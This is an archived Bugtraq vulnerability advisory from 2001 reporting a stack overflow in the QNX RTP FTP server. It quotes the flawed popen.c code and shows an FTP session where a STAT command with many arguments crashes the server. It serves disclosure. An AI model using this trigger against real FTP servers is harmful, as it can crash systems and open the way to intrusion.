Neohapsis Archives - Bugtraq - QNX RTP ftpd stack overflow

LOCATION: Neohapsis / Archives / Bugtraq / Message Index / QNX RTP ftpd stack overflow
From: Przemyslaw Frasunek (venglin@FREEBSD.LUBLIN.PL) Date: Fri Feb 02 2001 - 13:03:09 CST Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] QNX RTP uses a BSD derived FTP server, which is vulnerable to strtok() based stack overflow. Offending code from ftpd/popen.c: char *pop, argv[100], gargv[1000], vv[2]; for (argc = 0, cp = program;; cp = NULL) if (!(argv[argc++] = strtok(cp, " \t\n"))) break; /* glob each piece / gargv[0] = argv[0]; for (gargc = argc = 1; argv[argc]; argc++) { argv[argc] = strdup(argv[argc]); Code is called, when STAT command is issued. Overflow occurs, when large number of arguments is applied. Identifing vulnerable system: 220 quics.qnx.com FTP server (Version 5.60) ready. user ftp 331 Guest login ok, send ident as password. pass dupa 230 Guest login ok, access restrictions apply. stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a Connection closed by foreign host. BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are vulnerable to this attack. -- Fido: 2:480/124 WWW: http://www.frasunek.com/ NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Portions of this site are copyright 1998-2001, Neohapsis, Inc. Questions, comments or feedback, send E-mail to webmaster@neohapsis.com